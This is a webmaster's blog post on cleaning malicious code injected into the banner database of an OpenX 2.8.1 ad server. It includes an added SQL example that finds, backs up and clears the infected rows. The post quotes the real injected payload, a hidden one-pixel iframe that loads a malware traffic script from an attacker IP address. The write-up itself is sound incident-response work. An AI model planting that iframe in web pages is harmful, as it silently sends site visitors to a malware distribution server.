It hit me cold when I saw the virus scanner’s red message jumping onto the screen. Administering www.weimar.de, it is no fun having a virus warning on the front page of an official website.
The cause was OpenX version 2.8.1, which I updated to 2.8.5 – which seemed too late, since the database was already affected. I found this code within my banner JS:
<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>
Checking all PHP files (actually, the most important are these three:
- /var/yourdomain.conf.php
- /adjs.php
- /www/delivery/ajs.php
)
I found nothing. Check them anyway, because in some cases the hack is injected directly into those files (at the very beginning or the end).
So I checked my database, the table phpads_banners (or openx_banners), and found nothing obvious. The malicious code is hidden within the BLOB fields (whose content you can only see if you enable it in phpMyAdmin), and therefore there is one thing you can do: set these fields empty:
- prepend
- append
- htmlcache
- htmltemplate
I rigorously cleared out all the sh*t with this simple statement:
UPDATE `my_db`.`phpads_banners` SET `append` = NULL, `prepend` = NULL, `htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;
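Before running the blanket UPDATE above, it is worth seeing what is actually in those BLOB columns: `htmltemplate` holds the creative of every HTML banner and `prepend`/`append` may carry legitimate tracking snippets, so NULLing all four on every row also deletes banners that were never touched. The injection also hides from a naive search: the `"+"` in `<"+"iframe` splits the literal `<iframe` across two JavaScript string pieces, so searching the database for `<iframe` finds nothing, while searching for the bare word `iframe` (or the hostile IP address) does. The following is an added example, not part of the original post, written for MySQL against the OpenX 2.8 table layout; it assumes the table is `my_db.phpads_banners` with a `bannerid` primary key (adjust the prefix, e.g. `openx_banners`, to match your install) and that the backup table name is free.

```sql
-- Added example (not from the original post): find the infected OpenX banner
-- rows, keep a copy, and clear only those rows instead of the whole table.
-- Assumptions: MySQL, database `my_db`, table `phpads_banners` with a
-- `bannerid` primary key (OpenX 2.8 layout); the 194.8.250.211 host is the
-- one seen in this incident, add any other indicators you find.

-- 1. Look inside the BLOB columns. CONVERT(... USING utf8) renders them as
--    text (what phpMyAdmin hides unless "show BLOB contents" is enabled) and
--    makes the LIKE match case-insensitive. Match the bare word "iframe":
--    the payload is stored as <"+"iframe, so '<iframe' would miss it.
SELECT bannerid,
       CONVERT(prepend      USING utf8) AS prepend_txt,
       CONVERT(append       USING utf8) AS append_txt,
       CONVERT(htmltemplate USING utf8) AS htmltemplate_txt,
       CONVERT(htmlcache    USING utf8) AS htmlcache_txt
FROM `my_db`.`phpads_banners`
WHERE CONVERT(CONCAT_WS(' ', prepend, append, htmltemplate, htmlcache) USING utf8)
      LIKE '%iframe%'
   OR CONVERT(CONCAT_WS(' ', prepend, append, htmltemplate, htmlcache) USING utf8)
      LIKE '%194.8.250.211%';

-- 2. Keep the affected rows so legitimate HTML banners or tracking snippets
--    can be restored by hand after the injected part has been cut out.
CREATE TABLE `my_db`.`phpads_banners_backup` AS
SELECT *
FROM `my_db`.`phpads_banners`
WHERE CONVERT(CONCAT_WS(' ', prepend, append, htmltemplate, htmlcache) USING utf8)
      LIKE '%iframe%'
   OR CONVERT(CONCAT_WS(' ', prepend, append, htmltemplate, htmlcache) USING utf8)
      LIKE '%194.8.250.211%';

-- 3. Clear the four columns, but only on the rows that matched, inside a
--    transaction so the result can be inspected before it is committed.
START TRANSACTION;

UPDATE `my_db`.`phpads_banners`
SET prepend = NULL, append = NULL, htmltemplate = NULL, htmlcache = NULL
WHERE CONVERT(CONCAT_WS(' ', prepend, append, htmltemplate, htmlcache) USING utf8)
      LIKE '%iframe%'
   OR CONVERT(CONCAT_WS(' ', prepend, append, htmltemplate, htmlcache) USING utf8)
      LIKE '%194.8.250.211%';

-- Re-run the SELECT from step 1 here; it must return zero rows.
COMMIT;
```

If step 1 returns every banner, the blanket UPDATE from the post is the faster route, but the backup table still costs nothing and lets you put the real HTML creatives back afterwards. Clearing `htmlcache` alone is not enough: OpenX regenerates it from `htmltemplate`, so both must be cleaned together.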
Good luck!